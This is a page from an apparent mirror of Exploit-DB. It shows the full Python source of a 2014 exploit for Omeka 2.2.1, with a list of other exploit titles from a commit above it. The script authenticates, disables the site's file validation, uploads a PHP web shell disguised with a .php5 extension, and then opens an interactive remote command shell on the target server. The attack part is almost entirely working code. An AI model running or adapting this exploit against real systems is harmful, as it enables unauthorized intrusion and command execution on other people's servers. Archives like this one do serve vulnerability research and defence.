bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/remote/34160.py
Offensive Security 6cbe6ebbb6 DB: 2021-09-03 
395 changes to exploits/shellcodes

EO Video 1.36 - Local Heap Overflow Denial of Service / (PoC)

Electronics Workbench - '.ewb' Local Stack Overflow (PoC)

BulletProof FTP Client 2.63 - Local Heap Overflow (PoC)

Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)

Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)

eEye Retina WiFi Security Scanner 1.0 - '.rws Parsing' Buffer Overflow (PoC)

Zortam MP3 Media Studio 9.40 - Multiple Memory Corruption Vulnerabilities

ImTOO MPEG Encoder 3.1.53 - '.cue' / '.m3u' Local Buffer Overflow (PoC)

ZoIPer 2.22 - Call-Info Remote Denial of Service
PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service
PHP - MultiPart Form-Data Denial of Service (PoC)
PHP < 5.3.1 - 'MultiPart/form-data' Denial of Service
PHP - MultiPart Form-Data Denial of Service (PoC)

Nuked KLan 1.7.7 & SP4 - Denial of Service

AIC Audio Player 1.4.1.587 - Local Crash (PoC)

Xerox 4595 - Denial of Service

WinMerge 2.12.4 - Project File Handling Stack Overflow

Acoustica Mixcraft 1.00 - Local Crash

SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)

Oreans WinLicense 2.1.8.0 - XML File Handling Memory Corruption

Spotify 0.8.2.610 - search func Memory Exhaustion

Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow (PoC)

WaveSurfer 1.8.8p4 - Memory Corruption (PoC)
DIMIN Viewer 5.4.0 - Crash (PoC)
FreeVimager 4.1.0 - Crash (PoC)
DIMIN Viewer 5.4.0 - Crash (PoC)
FreeVimager 4.1.0 - Crash (PoC)

CoolPlayer+ Portable 2.19.4 - Local Buffer Overflow

Light Audio Player 1.0.14 - Memory Corruption (PoC)

Image Transfer IOS - Remote Crash (PoC)

Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)

VUPlayer 2.49 - '.cue' Universal Buffer Overflow

Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation

IBM AIX 5.3 - 'libc' MALLOCDEBUG File Overwrite

Hex Workshop 4.23/5.1/6.0 - '.hex' Universal Local Buffer Overflow (SEH)

Soritong MP3 Player 1.0 - '.m3u' / UI.txt Universal Local Buffer Overflow

Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal

Millenium MP3 Studio - '.pls' / '.mpf' / '.m3u' Universal Local Buffer Overflow (SEH)

Alleycode HTML Editor 2.2.1 - Local Buffer Overflow

GPG2/Kleopatra 2.0.11 - Malformed Certificate

Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow

OtsTurntables Free 1.00.047 - '.olf' Universal Buffer Overflow

Watermark Master 2.2.23 - '.wstyle' Local Buffer Overflow (SEH)

Dropbox < 3.3.x - OSX FinderLoadBundle Privilege Escalation

MySQL / MariaDB / PerconaDB 5.5.51/5.6.32/5.7.14 - Code Execution / Privilege Escalation
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (1)
eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (2)

eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)

QK SMTP 3.01 - 'RCPT TO' Remote Buffer Overflow (2)

CA BrightStor ARCserve - 'msgeng.exe' Remote Stack Overflow

quickshare file share 1.2.1 - Directory Traversal (1)

SPlayer 3.7 (build 2055) - Remote Buffer Overflow

Acunetix 8 build 20120704 - Remote Stack Overflow

Omeka 2.2.1 - Remote Code Execution

D-Link DSL-2740R - Remote DNS Change
D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
D-Link DSL-2730U/2750U/2750E ADSL Router - Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure

Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution

TorrentTrader 1.0 RC2 - SQL Injection

WEBInsta CMS 0.3.1 - 'templates_dir' Remote File Inclusion

MiniPort@l 0.1.5 Beta - 'skiny' Remote File Inclusion

PHP DocWriter 0.3 - 'script' Remote File Inclusion

phpBB Journals System Mod 1.0.2 RC2 - Remote File Inclusion

phpBB SpamBlocker Mod 1.0.2 - Remote File Inclusion
RSSonate - 'xml2rss.php' Remote File Inclusion
CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion
RSSonate - 'xml2rss.php' Remote File Inclusion
CASTOR 1.1.1 - '/lib/rs.php' Remote File Inclusion

QnECMS 2.5.6 - 'adminfolderpath' Remote File Inclusion

BrewBlogger 1.3.1 - 'printLog.php' SQL Injection

e-Ark 1.0 - '/src/ark_inc.php' Remote File Inclusion

awrate.com Message Board 1.0 - 'search.php' Remote File Inclusion

Tucows Client Code Suite (CSS) 1.2.1015 - Remote File Inclusion

Gizzar 03162002 - 'index.php' Remote File Inclusion

SH-News 0.93 - 'misc.php' Remote File Inclusion

JSBoard 2.0.10 - 'login.php?table' Local File Inclusion

XOOPS Module WF-Links 1.03 - 'cid' SQL Injection

Scorp Book 1.0 - 'smilies.php?config' Remote File Inclusion

WEBInsta FM 0.1.4 - 'login.php' absolute_path Remote File Inclusion

mxBB Module FAQ & RULES 2.0.0 - Remote File Inclusion

EQdkp 1.3.2 - 'listmembers.php' SQL Injection

FlashBB 1.1.8 - 'sendmsg.php' Remote File Inclusion

SimpleBlog 3.0 - 'comments_get.asp?id' SQL Injection

Pakupaku CMS 0.4 - Arbitrary File Upload / Local File Inclusion

CCMS 3.1 Demo - SQL Injection

MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass

BlogPHP 2 - 'id' Cross-Site Scripting / SQL Injection

AuraCMS 1.62 - Multiple SQL Injections

sCssBoard (Multiple Versions) - 'pwnpack' Remote s

EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion

RevokeBB 1.0 RC11 - 'Search' SQL Injection

Galatolo Web Manager 1.0 - Cross-Site Scripting / Local File Inclusion

CaupoShop Classic 1.3 - 'saArticle[ID]' SQL Injection

PHPortal 1.2 - Multiple Remote File Inclusions

Libera CMS 1.12 - 'cookie' SQL Injection

Zanfi CMS lite 2.1 / Jaw Portal free - 'FCKeditor' Arbitrary File Upload

WCMS 1.0b - Arbitrary Add Admin

FOSS Gallery Admin 1.0 - Arbitrary File Upload

MemHT Portal 4.0.1 - SQL Injection / Code Execution

Mediatheka 4.2 - Blind SQL Injection

Pligg 9.9.5b - Arbitrary File Upload / SQL Injection

XOOPS 2.3.2 - 'mydirname' PHP Remote Code Execution

Joomla! Component Casino 0.3.1 - Multiple SQL Injections s

ZeusCart 2.3 - 'maincatid' SQL Injection

ASP Football Pool 2.3 - Remote Database Disclosure

LightNEasy sql/no-db 2.2.x - System Configuration Disclosure

Zen Cart 1.3.8 - Remote Code Execution

Joomla! Component com_pinboard - 'task' SQL Injection

Joomla! Component com_bookflip - 'book_id' SQL Injection

Messages Library 2.0 - Arbitrary Delete Message

Arab Portal 2.2 - Blind Cookie Authentication Bypass

Joomla! Plugin JD-WordPress 2.0 RC2 - Remote File Inclusion

REZERVI 3.0.2 - Remote Command Execution

Joomla! Component BF Quiz 1.0 - SQL Injection (2)

E-Xoopport Samsara 3.1 (eCal Module) - Blind SQL Injection

AJ Matrix DNA - SQL Injection

Joomla! Component JE Story Submit - Local File Inclusion

CF Image Hosting Script 1.3.82 - File Disclosure

hastymail2 webmail 1.1 rc2 - Persistent Cross-Site Scripting

CMSLogik 1.2.1 - Multiple Vulnerabilities

C.P.Sub 4.5 - Authentication Bypass

WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload

Joomla! Component com_hdflvplayer < 2.1.0.1 - SQL Injection

WordPress Plugin WP Symposium 14.11 - Arbitrary File Upload

PHPMailer < 5.2.20 - Remote Code Execution

phpIPAM 1.4 - SQL Injection

Joomla! 3.9.0 < 3.9.7 - CSV Injection
2021-09-03 14:58:20 +00:00

295 lines
No EOL
10 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/env python
#
#
# Omeka 2.2.1 Remote Code Execution Exploit
#
#
# Vendor: Omeka Team (CHNM GMU)
# Product web page: http://www.omeka.org
# Affected version: 2.2.1 and 2.2
#
# Summary: Omeka is a free, flexible, and open source web-publishing
# platform for the display of library, museum, archives, and scholarly
# collections and exhibitions. Its 'five-minute setup' makes launching
# an online exhibition as easy as launching a blog.
#
# Desc: Omeka suffers from an authenticated arbitrary PHP code execution.
# The vulnerability is caused due to the improper verification of
# uploaded files in '/admin/items/add' script thru the 'file[0]' POST
# parameter. This can be exploited to execute arbitrary PHP code by
# uploading a malicious PHP script file that will be stored in
# '/files/original' directory after successfully disabling the file
# validation option (or adding something like 'application/x-php' into the
# allowed MIME types list) and bypassing the rewrite rule in the '.htaccess'
# file with '.php5' extension.
#
# .htaccess fix by vendor:
# -------------------------------------------------------
# Line 29: -RewriteRule !\.php$ - [C]
# Line 29: +RewriteRule !\.(php[0-9]?|phtml|phps)$ - [C]
# -------------------------------------------------------
#
# - Role permission for disabling validation and uploading files: Super
# - Role permission for uploading files: Super, Admin
#
# Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php
#
# Tested on: Kali Linux 3.7-trunk-686-pae
# Apache/2.2.22 (Debian)
# PHP 5.4.4-13(apache2handler)
# MySQL 5.5.28
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5194
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php
#
#
# 16.07.2014
#
#
version = '2.0.0.251'
import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re
from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError
init()
if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])
def bannerche():
print '''
@---------------------------------------------------------------@
| |
| Omeka 2.2.1 Remote Code Execution Exploit |
| |
| |
| ID: ZSL-2014-5194 |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
@---------------------------------------------------------------@
'''
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka\n'
sys.exit()
bannerche()
print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET
host = sys.argv[1]
path = sys.argv[2]
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
opener.open('http://'+host+'/'+path+'/admin/users/login')
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
print
sys.exit()
print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login please.'
username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')
login_data = urllib.urlencode({
'username' : username,
'password' : password,
'remember' : '0',
'submit' : 'Log In'
})
login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data)
auth = login.read()
for session in cj:
sessid = session.name
print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET
if re.search(r'Login information incorrect. Please try again.', auth):
print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET
disable_file_validation = urllib.urlencode({
'disable_default_file_validation' : '1',
'submit' : 'Save+Changes'
})
opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation)
print '\x20\x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET
class MultiPartForm(object):
def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return
def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary
def add_field(self, name, value):
self.form_fields.append((name, value))
return
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return
def __str__(self):
parts = []
part_boundary = '--' + self.boundary
parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)
parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)
flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)
if __name__ == '__main__':
form = MultiPartForm()
form.add_field('public', '1')
form.add_field('submit', 'Add Item')
form.add_file('file[0]', 'thricerbd.php5',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))
request = urllib2.Request('http://'+host+'/'+path+'/admin/items/add')
request.add_header('User-agent', 'joxypoxy 2.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
checkitemid = urllib2.urlopen(request).read()
itemid = re.search('The item #(\d+)', checkitemid).group(1)
print '\x20\x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET
checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid)
fileid = re.search('/admin/files/show/(\d+)', checkfileid.read()).group(1)
print '\x20\x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET
print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET
checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid)
hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1)
print '\x20\x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET
print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)
furl = '/files/original/'+hashfile+'.php5'
print
today = datetime.date.today()
fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)
logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\x20'+path+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5194')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')
print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)
print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET
if cmd.strip() == 'exit':
break
logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break
logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print
sys.exit()
##EDB-Note: Web server has to be able to interpret .php5 files
Reference in a new issue View git blame Copy permalink